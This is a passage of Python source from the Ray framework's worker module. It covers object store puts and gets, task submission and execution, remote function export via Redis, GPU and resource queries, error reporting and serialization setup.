counter += 1
try:
self.plasma_client.put(
value,
object_id=pyarrow.plasma.ObjectID(object_id.id()),
memcopy_threads=self.memcopy_threads,
serialization_context=self.serialization_context)
break
except pyarrow.SerializationCallbackError as e:
try:
register_custom_serializer(
type(e.example_object), use_dict=True)
warning_message = ("WARNING: Serializing objects of type "
"{} by expanding them as dictionaries "
"of their fields. This behavior may "
"be incorrect in some cases.".format(
type(e.example_object)))
logger.warning(warning_message)
except (serialization.RayNotDictionarySerializable,
serialization.CloudPickleError,
pickle.pickle.PicklingError, Exception):
# We also handle generic exceptions here because
# cloudpickle can fail with many different types of errors.
try:
register_custom_serializer(
type(e.example_object), use_pickle=True)
warning_message = ("WARNING: Falling back to "
"serializing objects of type {} by "
"using pickle. This may be "
"inefficient.".format(
type(e.example_object)))
logger.warning(warning_message)
except serialization.CloudPickleError:
register_custom_serializer(
type(e.example_object),
use_pickle=True,
local=True)
warning_message = ("WARNING: Pickling the class {} "
"failed, so we are using pickle "
"and only registering the class "
"locally.".format(
type(e.example_object)))
logger.warning(warning_message)
def put_object(self, object_id, value):
"""Put value in the local object store with object id objectid.
This assumes that the value for objectid has not yet been placed in the
local object store.
Args:
object_id (object_id.ObjectID): The object ID of the value to be
put.
value: The value to put in the object store.
Raises:
Exception: An exception is raised if the attempt to store the
object fails. This can happen if there is already an object
with the same ID in the object store or if the object store is
full.
"""
# Make sure that the value is not an object ID.
if isinstance(value, ray.ObjectID):
raise Exception("Calling 'put' on an ObjectID is not allowed "
"(similarly, returning an ObjectID from a remote "
"function is not allowed). If you really want to "
"do this, you can wrap the ObjectID in a list and "
"call 'put' on it (or return it).")
# Serialize and put the object in the object store.
try:
self.store_and_register(object_id, value)
except pyarrow.PlasmaObjectExists as e:
# The object already exists in the object store, so there is no
# need to add it again. TODO(rkn): We need to compare the hashes
# and make sure that the objects are in fact the same. We also
# should return an error code to the caller instead of printing a
# message.
logger.info(
"The object with ID {} already exists in the object store."
.format(object_id))
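# A minimal sketch of the usual flow through the public API, which routes
# stores through put_object (values are arbitrary examples):
#
#     obj_id = ray.put([1, 2, 3])   # serializes and stores the value
#     ray.get(obj_id)               # -> [1, 2, 3]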
def retrieve_and_deserialize(self, object_ids, timeout, error_timeout=10):
start_time = time.time()
# Only send the warning once.
warning_sent = False
while True:
try:
# We divide very large get requests into smaller get requests
# so that a single get request doesn't block the store for a
# long time; if the store is blocked, it can block the manager
# as well as a consequence.
results = []
for i in range(0, len(object_ids),
ray._config.worker_get_request_size()):
results += self.plasma_client.get(
object_ids[i:(
i + ray._config.worker_get_request_size())],
timeout, self.serialization_context)
return results
except pyarrow.lib.ArrowInvalid as e:
# TODO(ekl): the local scheduler could include relevant
# metadata in the task kill case for a better error message
invalid_error = RayTaskError(
"<unknown>", None,
"Invalid return value: likely worker died or was killed "
"while executing the task.")
return [invalid_error] * len(object_ids)
except pyarrow.DeserializationCallbackError as e:
# Wait a little bit for the import thread to import the class.
# If we currently have the worker lock, we need to release it
# so that the import thread can acquire it.
if self.mode == WORKER_MODE:
self.lock.release()
time.sleep(0.01)
if self.mode == WORKER_MODE:
self.lock.acquire()
if time.time() - start_time > error_timeout:
warning_message = ("This worker or driver is waiting to "
"receive a class definition so that it "
"can deserialize an object from the "
"object store. This may be fine, or it "
"may be a bug.")
if not warning_sent:
ray.utils.push_error_to_driver(
self,
ray_constants.WAIT_FOR_CLASS_PUSH_ERROR,
warning_message,
driver_id=self.task_driver_id.id())
warning_sent = True
def get_object(self, object_ids):
"""Get the value or values in the object store associated with the IDs.
Return the values from the local object store for object_ids. This will
block until all the values for object_ids have been written to the
local object store.
Args:
object_ids (List[object_id.ObjectID]): A list of the object IDs
whose values should be retrieved.
"""
# Make sure that the values are object IDs.
for object_id in object_ids:
if not isinstance(object_id, ray.ObjectID):
raise Exception("Attempting to call `get` on the value {}, "
"which is not an ObjectID.".format(object_id))
# Do an initial fetch for remote objects. We divide the fetch into
# smaller fetches so as to not block the manager for a prolonged period
# of time in a single call.
plain_object_ids = [
plasma.ObjectID(object_id.id()) for object_id in object_ids
]
for i in range(0, len(object_ids),
ray._config.worker_fetch_request_size()):
if not self.use_raylet:
self.plasma_client.fetch(plain_object_ids[i:(
i + ray._config.worker_fetch_request_size())])
else:
self.local_scheduler_client.reconstruct_objects(
object_ids[i:(
i + ray._config.worker_fetch_request_size())], True)
# Get the objects. We initially try to get the objects immediately.
final_results = self.retrieve_and_deserialize(plain_object_ids, 0)
# Construct a dictionary mapping object IDs that we haven't gotten yet
# to their original index in the object_ids argument.
unready_ids = {
plain_object_ids[i].binary(): i
for (i, val) in enumerate(final_results)
if val is plasma.ObjectNotAvailable
}
was_blocked = (len(unready_ids) > 0)
# Try reconstructing any objects we haven't gotten yet. Try to get them
# until at least get_timeout_milliseconds milliseconds passes, then
# repeat.
while len(unready_ids) > 0:
for unready_id in unready_ids:
self.local_scheduler_client.reconstruct_objects(
[ray.ObjectID(unready_id)], False)
# Do another fetch for objects that aren't available locally yet,
# in case they were evicted since the last fetch. We divide the
# fetch into smaller fetches so as to not block the manager for a
# prolonged period of time in a single call.
object_ids_to_fetch = list(
map(plasma.ObjectID, unready_ids.keys()))
ray_object_ids_to_fetch = list(
map(ray.ObjectID, unready_ids.keys()))
for i in range(0, len(object_ids_to_fetch),
ray._config.worker_fetch_request_size()):
if not self.use_raylet:
self.plasma_client.fetch(object_ids_to_fetch[i:(
i + ray._config.worker_fetch_request_size())])
else:
self.local_scheduler_client.reconstruct_objects(
ray_object_ids_to_fetch[i:(
i + ray._config.worker_fetch_request_size())],
True)
results = self.retrieve_and_deserialize(
object_ids_to_fetch,
max([
ray._config.get_timeout_milliseconds(),
int(0.01 * len(unready_ids))
]))
# Remove any entries for objects we received during this iteration
# so we don't retrieve the same object twice.
for i, val in enumerate(results):
if val is not plasma.ObjectNotAvailable:
object_id = object_ids_to_fetch[i].binary()
index = unready_ids[object_id]
final_results[index] = val
unready_ids.pop(object_id)
# If there were objects that we weren't able to get locally, let the
# local scheduler know that we're now unblocked.
if was_blocked:
self.local_scheduler_client.notify_unblocked()
assert len(final_results) == len(object_ids)
return final_results
def submit_task(self,
function_id,
args,
actor_id=None,
actor_handle_id=None,
actor_counter=0,
is_actor_checkpoint_method=False,
actor_creation_id=None,
actor_creation_dummy_object_id=None,
execution_dependencies=None,
num_return_vals=None,
resources=None,
driver_id=None):
"""Submit a remote task to the scheduler.
Tell the scheduler to schedule the execution of the function with ID
function_id with arguments args. Retrieve object IDs for the outputs of
the function from the scheduler and immediately return them.
Args:
function_id: The ID of the function to execute.
args: The arguments to pass into the function. Arguments can be
object IDs or they can be values. If they are values, they must
be serializable objects.
actor_id: The ID of the actor that this task is for.
actor_counter: The counter of the actor task.
is_actor_checkpoint_method: True if this is an actor checkpoint
task and false otherwise.
actor_creation_id: The ID of the actor to create, if this is an
actor creation task.
actor_creation_dummy_object_id: If this task is an actor method,
then this argument is the dummy object ID associated with the
actor creation task for the corresponding actor.
execution_dependencies: The execution dependencies for this task.
num_return_vals: The number of return values this function should
have.
resources: The resource requirements for this task.
driver_id: The ID of the relevant driver. This is almost always the
driver ID of the driver that is currently running. However, in
the exceptional case that an actor task is being dispatched to
an actor created by a different driver, this should be the
driver ID of the driver that created the actor.
Returns:
The return object IDs for this task.
"""
with profiling.profile("submit_task", worker=self):
check_main_thread()
if actor_id is None:
assert actor_handle_id is None
actor_id = ray.ObjectID(NIL_ACTOR_ID)
actor_handle_id = ray.ObjectID(NIL_ACTOR_HANDLE_ID)
else:
assert actor_handle_id is not None
if actor_creation_id is None:
actor_creation_id = ray.ObjectID(NIL_ACTOR_ID)
if actor_creation_dummy_object_id is None:
actor_creation_dummy_object_id = (ray.ObjectID(NIL_ID))
# Put large or complex arguments that are passed by value in the
# object store first.
args_for_local_scheduler = []
for arg in args:
if isinstance(arg, ray.ObjectID):
args_for_local_scheduler.append(arg)
elif ray.local_scheduler.check_simple_value(arg):
args_for_local_scheduler.append(arg)
else:
args_for_local_scheduler.append(put(arg))
# By default, there are no execution dependencies.
if execution_dependencies is None:
execution_dependencies = []
if driver_id is None:
driver_id = self.task_driver_id
if resources is None:
raise ValueError("The resources dictionary is required.")
for value in resources.values():
assert (isinstance(value, int) or isinstance(value, float))
if value < 0:
raise ValueError(
"Resource quantities must be nonnegative.")
if (value >= 1 and isinstance(value, float)
and not value.is_integer()):
raise ValueError(
"Resource quantities must all be whole numbers.")
# Submit the task to local scheduler.
task = ray.local_scheduler.Task(
driver_id, ray.ObjectID(
function_id.id()), args_for_local_scheduler,
num_return_vals, self.current_task_id, self.task_index,
actor_creation_id, actor_creation_dummy_object_id, actor_id,
actor_handle_id, actor_counter, is_actor_checkpoint_method,
execution_dependencies, resources, self.use_raylet)
# Increment the worker's task index to track how many tasks have
# been submitted by the current task so far.
self.task_index += 1
self.local_scheduler_client.submit(task)
return task.returns()
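# A minimal sketch of a resources dictionary accepted by the validation
# above (values are arbitrary examples): quantities below one may be
# fractional, while quantities of one or more must be whole numbers.
#
#     resources = {"CPU": 1, "GPU": 0.5}    # valid
#     resources = {"CPU": 1.5}              # rejected: >= 1 and not whole
#     resources = {"CPU": -1}               # rejected: negative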
def export_remote_function(self, function_id, function_name, function,
max_calls, decorated_function):
"""Export a remote function.
Args:
function_id: The ID of the function.
function_name: The name of the function.
function: The raw undecorated function to export.
max_calls: The maximum number of times a given worker can execute
this function before exiting.
decorated_function: The decorated function (this is used to enable
the remote function to recursively call itself).
"""
check_main_thread()
if self.mode not in [SCRIPT_MODE, SILENT_MODE]:
raise Exception("export_remote_function can only be called on a "
"driver.")
key = (b"RemoteFunction:" + self.task_driver_id.id() + b":" +
function_id.id())
# Work around limitations of Python pickling.
function_name_global_valid = function.__name__ in function.__globals__
function_name_global_value = function.__globals__.get(
function.__name__)
# Allow the function to reference itself as a global variable
if not is_cython(function):
function.__globals__[function.__name__] = decorated_function
try:
pickled_function = pickle.dumps(function)
finally:
# Undo our changes
if function_name_global_valid:
function.__globals__[function.__name__] = (
function_name_global_value)
else:
del function.__globals__[function.__name__]
check_oversized_pickle(pickled_function, function_name,
"remote function", self)
self.redis_client.hmset(
key, {
"driver_id": self.task_driver_id.id(),
"function_id": function_id.id(),
"name": function_name,
"module": function.__module__,
"function": pickled_function,
"max_calls": max_calls
})
self.redis_client.rpush("Exports", key)
def run_function_on_all_workers(self, function):
"""Run arbitrary code on all of the workers.
This function will first be run on the driver, and then it will be
exported to all of the workers to be run. It will also be run on any
new workers that register later. If ray.init has not been called yet,
then cache the function and export it later.
Args:
function (Callable): The function to run on all of the workers. It
should not take any arguments. If it returns anything, its
return values will not be used.
"""
check_main_thread()
# If ray.init has not been called yet, then cache the function and
# export it when connect is called. Otherwise, run the function on all
# workers.
if self.mode is None:
self.cached_functions_to_run.append(function)
else:
# Attempt to pickle the function before we need it. This could
# fail, and it is more convenient if the failure happens before we
# actually run the function locally.
pickled_function = pickle.dumps(function)
function_to_run_id = hashlib.sha1(pickled_function).digest()
key = b"FunctionsToRun:" + function_to_run_id
# First run the function on the driver.
# We always run the task locally.
function({"worker": self})
# Check if the function has already been put into redis.
function_exported = self.redis_client.setnx(b"Lock:" + key, 1)
if not function_exported:
# In this case, the function has already been exported, so
# we don't need to export it again.
return
check_oversized_pickle(pickled_function, function.__name__,
"function", self)
# Run the function on all workers.
self.redis_client.hmset(
key, {
"driver_id": self.task_driver_id.id(),
"function_id": function_to_run_id,
"function": pickled_function
})
self.redis_client.rpush("Exports", key)
# TODO(rkn): If the worker fails after it calls setnx and before it
# successfully completes the hmset and rpush, then the program will
# most likely hang. This could be fixed by making these three
# operations into a transaction (or by implementing a custom
# command that does all three things).
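# A minimal sketch of how a driver typically uses this hook (the path is a
# hypothetical example); the callable receives a dict containing the worker:
#
#     def setup(worker_info):
#         import sys
#         sys.path.append("/tmp/extra_modules")
#
#     ray.worker.global_worker.run_function_on_all_workers(setup)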
def _wait_for_function(self, function_id, driver_id, timeout=10):
"""Wait until the function to be executed is present on this worker.
This method will simply loop until the import thread has imported the
relevant function. If we spend too long in this loop, that may indicate
a problem somewhere and we will push an error message to the user.
If this worker is an actor, then this will wait until the actor has
been defined.
Args:
function_id (str): The ID of the function that we want to execute.
driver_id (str): The ID of the driver to push the error message to
if this times out.
"""
start_time = time.time()
# Only send the warning once.
warning_sent = False
while True:
with self.lock:
if (self.actor_id == NIL_ACTOR_ID
and (function_id.id() in
self.function_execution_info[driver_id])):
break
elif self.actor_id != NIL_ACTOR_ID and (
self.actor_id in self.actors):
break
if time.time() - start_time > timeout:
warning_message = ("This worker was asked to execute a "
"function that it does not have "
"registered. You may have to restart "
"Ray.")
if not warning_sent:
ray.utils.push_error_to_driver(
self,
ray_constants.WAIT_FOR_FUNCTION_PUSH_ERROR,
warning_message,
driver_id=driver_id)
warning_sent = True
time.sleep(0.001)
def _get_arguments_for_execution(self, function_name, serialized_args):
"""Retrieve the arguments for the remote function.
This retrieves the values for the arguments to the remote function that
were passed in as object IDs. Arguments that were passed by value are
not changed. This is called by the worker that is executing the remote
function.
Args:
function_name (str): The name of the remote function whose
arguments are being retrieved.
serialized_args (List): The arguments to the function. These are
either strings representing serialized objects passed by value
or they are ObjectIDs.
Returns:
The retrieved arguments in addition to the arguments that were
passed by value.
Raises:
RayGetArgumentError: This exception is raised if a task that
created one of the arguments failed.
"""
arguments = []
for (i, arg) in enumerate(serialized_args):
if isinstance(arg, ray.ObjectID):
# get the object from the local object store
argument = self.get_object([arg])[0]
if isinstance(argument, RayTaskError):
# If the result is a RayTaskError, then the task that
# created this object failed, and we should propagate the
# error message here.
raise RayGetArgumentError(function_name, i, arg, argument)
else:
# pass the argument by value
argument = arg
arguments.append(argument)
return arguments
def _store_outputs_in_objstore(self, object_ids, outputs):
"""Store the outputs of a remote function in the local object store.
This stores the values that were returned by a remote function in the
local object store. If any of the return values are object IDs, then
these object IDs are aliased with the object IDs that the scheduler
assigned for the return values. This is called by the worker that
executes the remote function.
Note:
The arguments object_ids and outputs should have the same length.
Args:
object_ids (List[ObjectID]): The object IDs that were assigned to
the outputs of the remote function call.
outputs (Tuple): The value returned by the remote function. If the
remote function was supposed to only return one value, then its
output was wrapped in a tuple with one element prior to being
passed into this function.
"""
for i in range(len(object_ids)):
if isinstance(outputs[i], ray.actor.ActorHandle):
raise Exception("Returning an actor handle from a remote "
"function is not allowed).")
self.put_object(object_ids[i], outputs[i])
def _process_task(self, task):
"""Execute a task assigned to this worker.
This method deserializes a task from the scheduler, and attempts to
execute the task. If the task succeeds, the outputs are stored in the
local object store. If the task throws an exception, RayTaskError
objects are stored in the object store to represent the failed task
(these will be retrieved by calls to get or by subsequent tasks that
use the outputs of this task).
"""
# The ID of the driver that this task belongs to. This is needed so
# that if the task throws an exception, we propagate the error
# message to the correct driver.
self.task_driver_id = task.driver_id()
self.current_task_id = task.task_id()
self.task_index = 0
self.put_index = 1
function_id = task.function_id()
args = task.arguments()
return_object_ids = task.returns()
if task.actor_id().id() != NIL_ACTOR_ID:
dummy_return_id = return_object_ids.pop()
function_executor = self.function_execution_info[
self.task_driver_id.id()][function_id.id()].function
function_name = self.function_execution_info[self.task_driver_id.id()][
function_id.id()].function_name
# Get task arguments from the object store.
try:
with profiling.profile("task:deserialize_arguments", worker=self):
arguments = self._get_arguments_for_execution(
function_name, args)
except (RayGetError, RayGetArgumentError) as e:
self._handle_process_task_failure(function_id, return_object_ids,
e, None)
return
except Exception as e:
self._handle_process_task_failure(
function_id, return_object_ids, e,
ray.utils.format_error_message(traceback.format_exc()))
return
# Execute the task.
try:
with profiling.profile("task:execute", worker=self):
if task.actor_id().id() == NIL_ACTOR_ID:
outputs = function_executor(*arguments)
else:
outputs = function_executor(
dummy_return_id, self.actors[task.actor_id().id()],
*arguments)
except Exception as e:
# Determine whether the exception occurred during a task, not an
# actor method.
task_exception = task.actor_id().id() == NIL_ACTOR_ID
traceback_str = ray.utils.format_error_message(
traceback.format_exc(), task_exception=task_exception)
self._handle_process_task_failure(function_id, return_object_ids,
e, traceback_str)
return
# Store the outputs in the local object store.
try:
with profiling.profile("task:store_outputs", worker=self):
# If this is an actor task, then the dummy output object ID was
# already popped from return_object_ids above, so its length is
# the correct number of values returned by the function itself.
num_returns = len(return_object_ids)
if num_returns == 1:
outputs = (outputs, )
self._store_outputs_in_objstore(return_object_ids, outputs)
except Exception as e:
self._handle_process_task_failure(
function_id, return_object_ids, e,
ray.utils.format_error_message(traceback.format_exc()))
def _handle_process_task_failure(self, function_id, return_object_ids,
error, backtrace):
function_name = self.function_execution_info[self.task_driver_id.id()][
function_id.id()].function_name
failure_object = RayTaskError(function_name, error, backtrace)
failure_objects = [
failure_object for _ in range(len(return_object_ids))
]
self._store_outputs_in_objstore(return_object_ids, failure_objects)
# Log the error message.
ray.utils.push_error_to_driver(
self,
ray_constants.TASK_PUSH_ERROR,
str(failure_object),
driver_id=self.task_driver_id.id(),
data={
"function_id": function_id.id(),
"function_name": function_name
})
def _become_actor(self, task):
"""Turn this worker into an actor.
Args:
task: The actor creation task.
"""
assert self.actor_id == NIL_ACTOR_ID
arguments = task.arguments()
assert len(arguments) == 1
self.actor_id = task.actor_creation_id().id()
class_id = arguments[0]
key = b"ActorClass:" + class_id
# Wait for the actor class key to have been imported by the import
# thread. TODO(rkn): It shouldn't be possible to end up in an infinite
# loop here, but we should push an error to the driver if too much time
# is spent here.
while key not in self.imported_actor_classes:
time.sleep(0.001)
with self.lock:
self.fetch_and_register_actor(key, self)
def _wait_for_and_process_task(self, task):
"""Wait for a task to be ready and process the task.
Args:
task: The task to execute.
"""
function_id = task.function_id()
driver_id = task.driver_id().id()
# TODO(rkn): It would be preferable for actor creation tasks to share
# more of the code path with regular task execution.
if (task.actor_creation_id() != ray.ObjectID(NIL_ACTOR_ID)):
self._become_actor(task)
return
# Wait until the function to be executed has actually been registered
# on this worker. We will push warnings to the user if we spend too
# long in this loop.
with profiling.profile("wait_for_function", worker=self):
self._wait_for_function(function_id, driver_id)
# Execute the task.
# TODO(rkn): Consider acquiring this lock with a timeout and pushing a
# warning to the user if we are waiting too long to acquire the lock
# because that may indicate that the system is hanging, and it'd be
# good to know where the system is hanging.
with self.lock:
function_name = (self.function_execution_info[driver_id][
function_id.id()]).function_name
if not self.use_raylet:
extra_data = {
"function_name": function_name,
"task_id": task.task_id().hex(),
"worker_id": binary_to_hex(self.worker_id)
}
else:
extra_data = {
"name": function_name,
"task_id": task.task_id().hex()
}
with profiling.profile("task", extra_data=extra_data, worker=self):
self._process_task(task)
# Push all of the log events to the global state store.
self.profiler.flush_profile_data()
# Increase the task execution counter.
self.num_task_executions[driver_id][function_id.id()] += 1
reached_max_executions = (
self.num_task_executions[driver_id][function_id.id()] == self.
function_execution_info[driver_id][function_id.id()].max_calls)
if reached_max_executions:
self.local_scheduler_client.disconnect()
os._exit(0)
def _get_next_task_from_local_scheduler(self):
"""Get the next task from the local scheduler.
Returns:
A task from the local scheduler.
"""
with profiling.profile("get_task", worker=self):
task = self.local_scheduler_client.get_task()
# Automatically restrict the GPUs available to this task.
ray.utils.set_cuda_visible_devices(ray.get_gpu_ids())
return task
def main_loop(self):
"""The main loop a worker runs to receive and execute tasks."""
def exit(signum, frame):
shutdown(worker=self)
sys.exit(0)
signal.signal(signal.SIGTERM, exit)
check_main_thread()
while True:
task = self._get_next_task_from_local_scheduler()
self._wait_for_and_process_task(task)
def get_gpu_ids():
"""Get the IDs of the GPUs that are available to the worker.
If the CUDA_VISIBLE_DEVICES environment variable was set when the worker
started up, then the IDs returned by this method will be a subset of the
IDs in CUDA_VISIBLE_DEVICES. If not, the IDs will fall in the range
[0, NUM_GPUS - 1], where NUM_GPUS is the number of GPUs that the node has.
Returns:
A list of GPU IDs.
"""
if _mode() == LOCAL_MODE:
raise Exception("ray.get_gpu_ids() currently does not work in PYTHON "
"MODE.")
if not global_worker.use_raylet:
assigned_ids = global_worker.local_scheduler_client.gpu_ids()
else:
all_resource_ids = global_worker.local_scheduler_client.resource_ids()
assigned_ids = [
resource_id for resource_id, _ in all_resource_ids.get("GPU", [])
]
# If the user had already set CUDA_VISIBLE_DEVICES, then respect that (in
# the sense that only GPU IDs that appear in CUDA_VISIBLE_DEVICES should be
# returned).
if global_worker.original_gpu_ids is not None:
assigned_ids = [
global_worker.original_gpu_ids[gpu_id] for gpu_id in assigned_ids
]
return assigned_ids
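# Example (sketch): inside a remote function that was allocated GPUs, the IDs
# returned above could be used to pin work to specific devices, e.g.
#
#     gpu_ids = ray.get_gpu_ids()
#     os.environ["CUDA_VISIBLE_DEVICES"] = ",".join(str(i) for i in gpu_ids)
#
# Note that ray.utils.set_cuda_visible_devices already does this for each task
# in _get_next_task_from_local_scheduler below.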
def get_resource_ids():
"""Get the IDs of the resources that are available to the worker.
This function is only supported in the raylet code path.
Returns:
A dictionary mapping the name of a resource to a list of pairs, where
each pair consists of the ID of a resource and the fraction of that
resource reserved for this worker.
"""
if not global_worker.use_raylet:
raise Exception("ray.get_resource_ids() is only supported in the "
"raylet code path.")
if _mode() == LOCAL_MODE:
raise Exception(
"ray.get_resource_ids() currently does not work in PYTHON "
"MODE.")
return global_worker.local_scheduler_client.resource_ids()
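# Illustrative return value (the exact resource IDs depend on the node); each
# pair is (resource ID, fraction of that resource reserved for this worker):
#
#     {"CPU": [(0, 1.0), (1, 1.0)], "GPU": [(0, 0.5)]}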
def _webui_url_helper(client):
"""Parsing for getting the url of the web UI.
Args:
client: A redis client to use to query the primary Redis shard.
Returns:
The URL of the web UI as a string.
"""
result = client.hmget("webui", "url")[0]
return ray.utils.decode(result) if result is not None else result
def get_webui_url():
"""Get the URL to access the web UI.
Note that the URL does not specify which node the web UI is on.
Returns:
The URL of the web UI as a string.
"""
if _mode() == LOCAL_MODE:
raise Exception("ray.get_webui_url() currently does not work in "
"PYTHON MODE.")
return _webui_url_helper(global_worker.redis_client)
global_worker = Worker()
"""Worker: The global Worker object for this worker process.
We use a global Worker object to ensure that there is a single worker object
per worker process.
"""
global_state = state.GlobalState()
class RayConnectionError(Exception):
pass
def check_main_thread():
"""Check that we are currently on the main thread.
Raises:
Exception: An exception is raised if this is called on a thread other
than the main thread.
"""
if threading.current_thread().getName() != "MainThread":
raise Exception("The Ray methods are not thread safe and must be "
"called from the main thread. This method was called "
"from thread {}."
.format(threading.current_thread().getName()))
def print_failed_task(task_status):
"""Print information about failed tasks.
Args:
task_status (Dict): A dictionary containing the name, operationid, and
error message for a failed task.
"""
logger.error("""
Error: Task failed
Function Name: {}
Task ID: {}
Error Message: \n{}
""".format(task_status["function_name"], task_status["operationid"],
task_status["error_message"]))
def error_applies_to_driver(error_key, worker=global_worker):
"""Return True if the error is for this driver and false otherwise."""
# TODO(rkn): Should probably check that this is only called on a driver.
# Check that the error key is formatted as in push_error_to_driver.
assert len(error_key) == (len(ERROR_KEY_PREFIX) + DRIVER_ID_LENGTH + 1 +
ERROR_ID_LENGTH), error_key
# If the driver ID in the error message is a sequence of all zeros, then
# the message is intended for all drivers.
generic_driver_id = DRIVER_ID_LENGTH * b"\x00"
driver_id = error_key[len(ERROR_KEY_PREFIX):(
len(ERROR_KEY_PREFIX) + DRIVER_ID_LENGTH)]
return (driver_id == worker.task_driver_id.id()
or driver_id == generic_driver_id)
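# For reference, the error keys parsed above have the layout
#     ERROR_KEY_PREFIX + <driver_id, DRIVER_ID_LENGTH bytes> + <one-byte
#     separator> + <error_id, ERROR_ID_LENGTH bytes>
# which is what the length assert and the slice in error_applies_to_driver
# rely on.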
def error_info(worker=global_worker):
"""Return information about failed tasks."""
worker.check_connected()
check_main_thread()
if worker.use_raylet:
return (global_state.error_messages(job_id=worker.task_driver_id) +
global_state.error_messages(job_id=ray_constants.NIL_JOB_ID))
error_keys = worker.redis_client.lrange("ErrorKeys", 0, -1)
errors = []
for error_key in error_keys:
if error_applies_to_driver(error_key, worker=worker):
error_contents = worker.redis_client.hgetall(error_key)
error_contents = {
"type": ray.utils.decode(error_contents[b"type"]),
"message": ray.utils.decode(error_contents[b"message"]),
"data": ray.utils.decode(error_contents[b"data"])
}
errors.append(error_contents)
return errors
def _initialize_serialization(worker=global_worker):
"""Initialize the serialization library.
This defines a custom serializer for object IDs and also tells ray to
serialize several exception classes that we define for error handling.
"""
worker.serialization_context = pyarrow.default_serialization_context()
# Tell the serialization context to use the cloudpickle version that we
# ship with Ray.
worker.serialization_context.set_pickle(pickle.dumps, pickle.loads)
pyarrow.register_torch_serialization_handlers(worker.serialization_context)
# Define a custom serializer and deserializer for handling Object IDs.
def object_id_custom_serializer(obj):
return obj.id()
def object_id_custom_deserializer(serialized_obj):
return ray.ObjectID(serialized_obj)
# We register this serializer on each worker instead of calling
# register_custom_serializer from the driver so that isinstance still
# works.
worker.serialization_context.register_type(
ray.ObjectID,
"ray.ObjectID",
pickle=False,
custom_serializer=object_id_custom_serializer,
custom_deserializer=object_id_custom_deserializer)
def actor_handle_serializer(obj):
return obj._serialization_helper(True)
def actor_handle_deserializer(serialized_obj):
new_handle = ray.actor.ActorHandle.__new__(ray.actor.ActorHandle)
new_handle._deserialization_helper(serialized_obj, True)
return new_handle
# We register this serializer on each worker instead of calling
# register_custom_serializer from the driver so that isinstance still
# works.
worker.serialization_context.register_type(
ray.actor.ActorHandle,
"ray.ActorHandle",
pickle=False,
custom_serializer=actor_handle_serializer,
custom_deserializer=actor_handle_deserializer)
if worker.mode in [SCRIPT_MODE, SILENT_MODE]:
# These should only be called on the driver because
# register_custom_serializer will export the class to all of the
# workers.
register_custom_serializer(RayTaskError, use_dict=True)
register_custom_serializer(RayGetError, use_dict=True)
register_custom_serializer(RayGetArgumentError, use_dict=True)
# Tell Ray to serialize lambdas with pickle.
register_custom_serializer(type(lambda: 0), use_pickle=True)
# Tell Ray to serialize types with pickle.
register_custom_serializer(type(int), use_pickle=True)
# Tell Ray to serialize FunctionSignatures as dictionaries. This is
# used when passing around actor handles.
register_custom_serializer(
ray.signature.FunctionSignature, use_dict=True)
def get_address_info_from_redis_helper(redis_address,
node_ip_address,
use_raylet=False):
redis_ip_address, redis_port = redis_address.split(":")
# For this command to work, some other client (on the same machine as
# Redis) must have run "CONFIG SET protected-mode no".
redis_client = redis.StrictRedis(
host=redis_ip_address, port=int(redis_port))
if not use_raylet:
# The client table prefix must be kept in sync with the file
# "src/common/redis_module/ray_redis_module.cc" where it is defined.
client_keys = redis_client.keys("{}*".format(
ray.gcs_utils.DB_CLIENT_PREFIX))
# Filter to live clients on the same node and do some basic checking.
plasma_managers = []
local_schedulers = []
for key in client_keys:
info = redis_client.hgetall(key)
# Ignore clients that were deleted.
deleted = info[b"deleted"]
deleted = bool(int(deleted))
if deleted:
continue
assert b"ray_client_id" in info
assert b"node_ip_address" in info
assert b"client_type" in info
client_node_ip_address = ray.utils.decode(info[b"node_ip_address"])
if (client_node_ip_address == node_ip_address or
(client_node_ip_address == "127.0.0.1"
and redis_ip_address == ray.services.get_node_ip_address())):
if ray.utils.decode(info[b"client_type"]) == "plasma_manager":
plasma_managers.append(info)
elif (ray.utils.decode(
info[b"client_type"]) == "local_scheduler"):
local_schedulers.append(info)
# Make sure that we got at least one plasma manager and local
# scheduler.
assert len(plasma_managers) >= 1
assert len(local_schedulers) >= 1
# Build the address information.
object_store_addresses = []
for manager in plasma_managers:
address = ray.utils.decode(manager[b"manager_address"])
port = services.get_port(address)
object_store_addresses.append(
services.ObjectStoreAddress(
name=ray.utils.decode(manager[b"store_socket_name"]),
manager_name=ray.utils.decode(
manager[b"manager_socket_name"]),
manager_port=port))
scheduler_names = [
ray.utils.decode(scheduler[b"local_scheduler_socket_name"])
for scheduler in local_schedulers
]
client_info = {
"node_ip_address": node_ip_address,
"redis_address": redis_address,
"object_store_addresses": object_store_addresses,
"local_scheduler_socket_names": scheduler_names,
# Web UI should be running.
"webui_url": _webui_url_helper(redis_client)
}
return client_info
# Handle the raylet case.
else:
# In the raylet code path, all client data is stored in a zset at the
# key for the nil client.
client_key = b"CLIENT" + NIL_CLIENT_ID
clients = redis_client.zrange(client_key, 0, -1)
raylets = []
for client_message in clients:
client = ray.gcs_utils.ClientTableData.GetRootAsClientTableData(
client_message, 0)
client_node_ip_address = ray.utils.decode(
client.NodeManagerAddress())
if (client_node_ip_address == node_ip_address or
(client_node_ip_address == "127.0.0.1"
and redis_ip_address == ray.services.get_node_ip_address())):
raylets.append(client)
object_store_addresses = [
services.ObjectStoreAddress(
name=ray.utils.decode(raylet.ObjectStoreSocketName()),
manager_name=None,
manager_port=None) for raylet in raylets
]
raylet_socket_names = [
ray.utils.decode(raylet.RayletSocketName()) for raylet in raylets
]
return {
"node_ip_address": node_ip_address,
"redis_address": redis_address,
"object_store_addresses": object_store_addresses,
"raylet_socket_names": raylet_socket_names,
# Web UI should be running.
"webui_url": _webui_url_helper(redis_client)
}
def get_address_info_from_redis(redis_address,
node_ip_address,
num_retries=5,
use_raylet=False):
counter = 0
while True:
try:
return get_address_info_from_redis_helper(
redis_address, node_ip_address, use_raylet=use_raylet)
except Exception as e:
if counter == num_retries:
raise
# Some of the information may not be in Redis yet, so wait a little
# bit.
logger.warning(
"Some processes that the driver needs to connect to have "
"not registered with Redis, so retrying. Have you run "
"'ray start' on this node?")
time.sleep(1)
counter += 1
def _normalize_resource_arguments(num_cpus, num_gpus, resources,
num_local_schedulers):
"""Stick the CPU and GPU arguments into the resources dictionary.
This also checks that the arguments are well-formed.
Args:
num_cpus: Either a number of CPUs or a list of numbers of CPUs.
num_gpus: Either a number of GPUs or a list of numbers of GPUs.
resources: Either a dictionary of resource mappings or a list of
dictionaries of resource mappings.
num_local_schedulers: The number of local schedulers.
Returns:
A list of dictionaries of resources of length num_local_schedulers.
"""
if resources is None:
resources = {}
if not isinstance(num_cpus, list):
